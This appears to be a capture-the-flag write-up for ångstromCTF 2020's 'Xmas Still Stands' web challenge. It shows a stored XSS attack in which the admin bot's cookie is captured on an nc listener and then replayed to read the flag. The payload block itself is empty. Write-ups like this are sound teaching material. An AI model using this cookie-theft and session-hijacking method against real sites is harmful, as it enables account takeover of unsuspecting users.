Tags: web xss 

Rating: 5.0

# ångstromCTF 2020 – Xmas Still Stands

* **Category:** web
* **Points:** 50

## Challenge

> You remember when I said I dropped clam's tables? Well that was on Xmas day. And because I ruined his Xmas, he created the Anti Xmas Warriors to try to ruin everybody's Xmas. Despite his best efforts, Xmas Still Stands. But, he did manage to get a flag and put it on his site. Can you get it?
>
> Author: aplet123
>
> https://xmas.2020.chall.actf.co/

## Solution

The title reminds the XSS vulnerability.

The `https://xmas.2020.chall.actf.co/post` page can be used to post a message with an XSS attack. For example using an `img` tag like the following.

```html

```

The website will return a code that can be used to identify the posted message.

The resulting code can be sent to administrator via `https://xmas.2020.chall.actf.co/report` page.

On a server listening with `nc`, you will receive the admin cookies.

```
ubuntu@server:~$ nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from ec2-52-207-14-64.compute-1.amazonaws.com 48884 received!
GET /?c=super_secret_admin_cookie=hello_yes_i_am_admin;%20admin_name=Jamie HTTP/1.1
Host: x.x.x.x:1337
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Jamie's browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:3000/posts/642
Accept-Encoding: gzip, deflate
Accept-Language: en-US
```

Then the cookie can be used to perform a request to `https://xmas.2020.chall.actf.co/admin` page.

```
GET /admin HTTP/1.1
Host: xmas.2020.chall.actf.co
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: super_secret_admin_cookie=hello_yes_i_am_admin;%20admin_name=Jamie
Referer: https://xmas.2020.chall.actf.co/admin
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-Length: 2905
Content-Type: text/html; charset=utf-8
Date: Mon, 16 Mar 2020 00:07:35 GMT
Etag: W/"b59-k/yKe0HiO0ZF+89xBSA/dXuyjnQ"
Server: Caddy
Server: nginx/1.14.1
X-Powered-By: Express
Connection: close

<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<link rel="stylesheet" href="/bootstrap.css">
<link rel="stylesheet" href="/style.css">

<title>Anti-Xmas Warriors</title>

<script defer src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script defer src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
<script defer src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-primary">
Anti-Xmas Warriors
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<span></span>
</button>

<div class="collapse navbar-collapse" id="navbarSupportedContent">


</div>
</nav> <div class="container mx-auto text-center partial-width pt-2">
<h1 class="display-4">Admin Landing Page</h1>

Hey admins, you may have noticed that we've changed things up a bit. There's no longer any cumbersome, bruteforceable login system. All you need is the secret cookie verifying that you're an admin and you can get the flag anytime you want. Also, if you're not an admin PLEASE LEAVE THIS PAGE YOU DON'T BELONG HERE AND I WILL HUNT YOU DOWN AND RUIN YOUR DAY IF YOU STAY HERE. Disclaimer: I will not actually hunt you down or physically hurt you in any way, shape, or form, please don't sue me thanks.


Oh hey admin! The flag is actf{s4n1tize_y0ur_html_4nd_y0ur_h4nds}.


</div>
</body>
</html>
```

The flag is the following.

```
actf{s4n1tize_y0ur_html_4nd_y0ur_h4nds}
```

Original writeup (https://github.com/m3ssap0/CTF-Writeups/blob/master/%C3%A5ngstromCTF%202020/Xmas%20Still%20Stands/README.md).